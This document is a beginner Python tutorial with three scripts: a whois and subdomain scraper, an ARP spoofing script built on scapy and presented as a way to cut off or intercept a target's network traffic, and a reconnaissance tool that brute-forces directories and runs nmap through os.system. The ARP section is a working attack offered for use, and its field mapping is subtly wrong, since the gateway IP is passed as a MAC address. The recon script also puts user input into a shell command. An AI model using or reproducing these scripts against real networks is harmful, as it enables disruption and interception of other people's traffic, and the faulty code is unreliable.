For beginners eager to learn Python, here is a close look at three entry-level Python tools. This first installment covers three basic tools; hopefully newcomers will have a basic understanding of Python scripting after reading it.



Tool 1: use Python's requests module to build a whois information collector;



Tool 2: write an ARP network cut-off attack in Python;

Tool 3: directory information collection.

Tool 1, foreword: this is for friends who want to write a project but have no idea where to start. These scripts are relatively easy to understand.

First, briefly sort out what this tool needs to do. The script collects the following information:

IP information

Subdomains

ICP filing

Registrant

Email

Address

Phone

DNS

The specific steps are as follows:

The module we need is requests

pip install requests, or python setup.py install

Queries are made through http://site.ip138.com

In the URLs below, {domain} is the domain name you want to query. The suffixes and purposes follow the script in this article:

http://site.ip138.com/{domain}/ # this page shows the IP resolution records

http://site.ip138.com/{domain}/domain.htm # this page is used to query subdomains

http://site.ip138.com/{domain}/beian.htm # this page is used to query the ICP filing

http://site.ip138.com/{domain}/whois.htm # this page is used for the whois query
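The URL patterns can be sketched as a small helper. This is only an illustration: the function name `build_query_urls` and the dictionary keys are hypothetical, and the `.htm` suffixes and the page-to-purpose mapping are taken from the script in this article rather than verified against the site.

```python
BASE = "http://site.ip138.com"


def build_query_urls(domain):
    """Return the lookup pages for one domain, keyed by what each page reports.

    The keys are illustrative names, not anything defined by the site.
    """
    # Tolerate stray whitespace or a trailing slash in user input
    domain = domain.strip().strip("/")
    return {
        "ip_records": "{}/{}/".format(BASE, domain),
        "subdomains": "{}/{}/domain.htm".format(BASE, domain),
        "icp_filing": "{}/{}/beian.htm".format(BASE, domain),
        "whois": "{}/{}/whois.htm".format(BASE, domain),
    }


if __name__ == "__main__":
    for name, url in build_query_urls("example.com").items():
        print(name, url)
```

Keeping the URL construction in one place makes it easier to adjust if the site changes its paths.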

OK, now let's start writing the code. It contains detailed comments.

```python
# First import requests, time, and BeautifulSoup from bs4
import time

import requests
from bs4 import BeautifulSoup

# Record the start time
start = time.time()


def chax():
    # Ask the user which domain name to query
    lid = input('Please enter the domain name you want to query:')
    # Send a browser User-Agent header to get past anti-crawler checks
    head = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'
    }
    # Build the URLs
    url = "http://site.ip138.com/{}/".format(lid)
    urldomain = "http://site.ip138.com/{}/domain.htm".format(lid)
    url2 = "http://site.ip138.com/{}/beian.htm".format(lid)
    url3 = "http://site.ip138.com/{}/whois.htm".format(lid)
    # Fetch the pages
    rb = requests.get(url, headers=head)
    rb1 = requests.get(urldomain, headers=head)
    rb2 = requests.get(url2, headers=head)
    rb3 = requests.get(url3, headers=head)
    # Parse the content as HTML
    gf = BeautifulSoup(rb.content, 'html.parser')
    print('[+] IP resolution records')
    # Read every <p> tag in the content
    for x in gf.find_all('p'):
        # Take the text content of the tag
        link = x.get_text()
        print(link)
    gf1 = BeautifulSoup(rb1.content, 'html.parser')
    print('[+] Subdomain query')
    for v in gf1.find_all('p'):
        link2 = v.get_text()
        print(link2)
    gf2 = BeautifulSoup(rb2.content, 'html.parser')
    print('[+] ICP filing query')
    for s in gf2.find_all('p'):
        link3 = s.get_text()
        print(link3)
    gf3 = BeautifulSoup(rb3.content, 'html.parser')
    print('[+] whois query')
    for k in gf3.find_all('p'):
        link4 = k.get_text()
        print(link4)


chax()
end = time.time()
print('Query time:', end - start)
```
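To see what the "find every `<p>` tag and print its text" step does without touching the network, here is a minimal offline sketch. It swaps in the standard library's `html.parser` instead of BeautifulSoup so it runs with no extra installs; the class name `ParagraphText`, the helper `paragraph_texts`, and the sample HTML are all made up for illustration, and the sketch assumes every `<p>` has a closing tag.

```python
from html.parser import HTMLParser


class ParagraphText(HTMLParser):
    """Collect the text found inside each <p>...</p> element."""

    def __init__(self):
        super().__init__()
        self._inside = False   # True while we are between <p> and </p>
        self._buffer = []      # text pieces of the current paragraph
        self.paragraphs = []   # finished paragraph strings

    def handle_starttag(self, tag, attrs):
        if tag == "p":
            self._inside = True

    def handle_endtag(self, tag):
        if tag == "p" and self._inside:
            self.paragraphs.append("".join(self._buffer).strip())
            self._buffer = []
            self._inside = False

    def handle_data(self, data):
        # Text in nested tags such as <b> still belongs to the paragraph
        if self._inside:
            self._buffer.append(data)


def paragraph_texts(html):
    parser = ParagraphText()
    parser.feed(html)
    parser.close()
    return parser.paragraphs


# Made-up page content, only to exercise the parser
SAMPLE = (
    "<html><body><h1>Title</h1>"
    "<p>1.2.3.4 <b>2018-01-01</b></p>"
    "<div>skip</div><p>second</p></body></html>"
)

if __name__ == "__main__":
    for text in paragraph_texts(SAMPLE):
        print(text)
```

Text outside `<p>` tags (the heading and the `div` here) is ignored, which is why the script above prints only the paragraph content of each result page.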

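Do you know how an ARP attack works? It doesn't matter if you don't; an introduction follows.

How an ARP attack works:

ARP spoofing forges the mapping between an IP address and a MAC address and floods the network with ARP traffic. By continuously sending ARP packets, the attacker can carry out a man-in-the-middle attack or cut off the target's network access. (PS: a few parameters in scapy are all we need to do this.)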
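The principle can be illustrated with a toy model that sends nothing on the network. It is a deliberately simplified sketch: the class `ArpCache`, its methods, and the addresses are hypothetical, and a real operating system's ARP handling has more rules than "the newest reply wins".

```python
class ArpCache:
    """Toy model of a host's IP-to-MAC table that trusts every reply it sees."""

    def __init__(self):
        self.table = {}

    def on_reply(self, sender_ip, sender_mac):
        # ARP has no authentication, so in this model the newest claim wins
        self.table[sender_ip] = sender_mac

    def next_hop_mac(self, ip):
        return self.table.get(ip)


# Made-up addresses for the illustration
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "aa:aa:aa:aa:aa:aa"
ATTACKER_MAC = "cc:cc:cc:cc:cc:cc"

victim = ArpCache()
victim.on_reply(GATEWAY_IP, GATEWAY_MAC)    # genuine reply from the gateway
before = victim.next_hop_mac(GATEWAY_IP)
victim.on_reply(GATEWAY_IP, ATTACKER_MAC)   # forged reply claiming the gateway's IP
after = victim.next_hop_mac(GATEWAY_IP)

print(before, "->", after)
```

After the forged reply, frames meant for the gateway are addressed to the forged MAC. If that MAC belongs to the attacker, the traffic passes through the attacker (man in the middle); if it belongs to no live host, the traffic goes nowhere and the victim loses connectivity.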

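Introduction to scapy:

Scapy is a Python program that lets users send, sniff, dissect, and forge network packets. This capability allows building tools that can probe, scan, or attack networks.

In other words, Scapy is a powerful interactive packet manipulation program. It can forge or decode packets of a large number of protocols, send them on the wire, capture them, match requests and replies, and more. Scapy easily handles most classic tasks such as scanning, tracerouting, probing, unit tests, attacks, or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f, and even some parts of Nmap, tcpdump, and tshark.

PS: to learn how to use scapy properly, please read its introduction and basics carefully: 【link】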

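Installation for py2:

pip install scapy

Installation for py3:

pip install scapy3

(Current Scapy releases also support Python 3 through pip install scapy.)

More installation methods: 【link】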

My system environment: Kali Linux

Readers can also consider the following system environments:

CentOS

Ubuntu

macOS

PS: try not to use Windows; Windows will throw errors!

It reports that windows.dll is missing. Whether the error persists after installing this DLL is unclear, and the official project has not given an answer.

Writing the attack script: Ether constructs the network packet, ARP carries out the ARP attack, and sendp sends the packets.

```python
import os
import sys

from scapy.layers.l2 import getmacbyip
from scapy.all import Ether, ARP, sendp

# Run the command that shows the IP configuration
ifconfig = os.system('ifconfig')
print(ifconfig)
gmac = input('Please enter gateway IP:')
liusheng = input('Please enter your IP:')
liusrc = input('Please enter target IP:')
try:
    # Get the target's MAC
    tg = getmacbyip(liusrc)
    print(tg)
except Exception as f:
    print('[-]{}'.format(f))
    exit()


def arpspoof():
    try:
        eth = Ether()
        arp = ARP(
            op="is-at",      # ARP reply
            hwsrc=gmac,      # gateway MAC
            psrc=liusheng,   # gateway IP
            hwdst=tg,        # target MAC
            pdst=liusrc      # target IP
        )
        # Output the configuration
        print((eth / arp).show())
        # Start sending packets
        sendp(eth / arp, inter=2, loop=1)
    except Exception as g:
        print('[-]{}'.format(g))
        exit()


arpspoof()
```

From the victim's perspective

Tool 3: if you want to dig for web vulnerabilities, information gathering has to come first.

Let's write a script that collects information.

Preparation:

Install the requests and bs4 modules: pip install requests, then pip install bs4. Alternatively, download the corresponding module archives, find setup.py, and run python setup.py install.

Approach:

Use the headers attribute of the requests response to get the HTTP header information

Use the HTTP response code to judge whether robots.txt exists

Use the HTTP response code to determine which directories exist

Use nmap to determine the open ports (PS: here I use the os module to run the nmap command for the scan; on my machine, nmap stops as soon as the nmap module is called)

Crawl a website to get the corresponding whois and reverse-IP domain name information.
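The directory-check step boils down to two small decisions: which URLs to request, and how to read the response code. The sketch below covers both without making any request. The function names `candidate_urls` and `looks_present` are hypothetical, and treating only status 200 as "exists" mirrors the check used in this article's script rather than a general rule (a site may answer 200 for missing pages, or 301/403 for real ones).

```python
def candidate_urls(host, wordlist_text):
    """Turn wordlist lines into full URLs, skipping blanks and fixing slashes."""
    urls = []
    for line in wordlist_text.splitlines():
        path = line.strip()
        if not path:
            continue  # a blank line would otherwise probe the bare host
        if not path.startswith("/"):
            path = "/" + path
        urls.append("http://{}{}".format(host, path))
    return urls


def looks_present(status_code):
    """Apply the article's rule: only HTTP 200 counts as an existing path."""
    return status_code == 200


if __name__ == "__main__":
    sample = "/admin\n\nlogin.php\n  /robots.txt  \n"
    for url in candidate_urls("example.com", sample):
        print(url)
```

Normalizing the wordlist first avoids malformed URLs when an entry lacks a leading slash or the file ends with an empty line.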

Start:

```python
import os
import socket

import requests
from bs4 import BeautifulSoup

# Browser User-Agent header shared by every request
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'
}


# Collect the HTTP fingerprint (response headers)
def Webfingerprintcollection():
    global lgr
    lgr = input('Please enter the target domain name:')
    url = "http://{}".format(lgr)
    r = requests.get(url, headers=HEADERS)
    xyt = r.headers
    for key in xyt:
        print(key, ':', xyt[key])


Webfingerprintcollection()
print('================================================')


# Check whether robots.txt exists
def robots():
    urlsd = "http://{}/robots.txt".format(lgr)
    gf = requests.get(urlsd, headers=HEADERS, timeout=8)
    if gf.status_code == 200:
        print('robots.txt exists')
        print('[+] The site has robots.txt', urlsd)
    else:
        print('[-] No robots.txt')


robots()
print("=================================================")


# Directory scan
def Webdirectoryscanner():
    # build.txt holds one path per line, each starting with "/"
    with open('build.txt', 'r', encoding='utf-8') as f:
        paths = f.read().split('\n')
    for xyt in paths:
        if not xyt:
            continue  # skip blank lines
        try:
            urljc = "http://" + lgr + "{}".format(xyt)
            rvc = requests.get(urljc, headers=HEADERS, timeout=8)
            if rvc.status_code == 200:
                print('[*]', urljc)
        except requests.RequestException:
            print('[-] The remote host forcibly closed an existing connection')


Webdirectoryscanner()
print("=====================================================")
s = socket.gethostbyname(lgr)


# Port scan
def portscanner():
    # os.system prints nmap's output directly and returns its exit status
    o = os.system('nmap {}'.format(s))
    print(o)


portscanner()
print('======================================================')


# whois query
def whois():
    urlwhois = "http://site.ip138.com/{}/whois.htm".format(lgr)
    rvt = requests.get(urlwhois, headers=HEADERS)
    bv = BeautifulSoup(rvt.content, "html.parser")
    for line in bv.find_all('p'):
        link = line.get_text()
        print(link)


whois()
print('======================================================')


# Reverse-IP domain lookup
def IPbackupdomainname():
    wu = socket.gethostbyname(lgr)
    rks = "http://site.ip138.com/{}/".format(wu)
    sjk = requests.get(rks, headers=HEADERS)
    liverou = BeautifulSoup(sjk.content, 'html.parser')
    for low in liverou.find_all('li'):
        bc = low.get_text()
        print(bc)


IPbackupdomainname()
print('=======================================================')
```




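One detail about the port-scan step: `os.system` returns the command's exit status, not its output, so printing its return value shows a number rather than the scan results. If you want the output as a string, a possible alternative is `subprocess.run`. The helper name `run_and_capture` below is hypothetical, and the demo runs the Python interpreter itself instead of nmap so that it works on any machine; with nmap installed, the call would be `run_and_capture(["nmap", ip])`.

```python
import subprocess
import sys


def run_and_capture(argv, timeout=60):
    """Run a command without a shell and return (exit_code, output_text)."""
    done = subprocess.run(
        argv,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,   # fold error messages into the same text
        text=True,                  # decode bytes to str
        timeout=timeout,
    )
    return done.returncode, done.stdout


# Stand-in command so the sketch runs without nmap installed
code, text = run_and_capture([sys.executable, "-c", "print('scan output')"])
print(code, text.strip())
```

Passing the command as a list also avoids shell interpretation of the target string, which matters when that string comes from user input.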
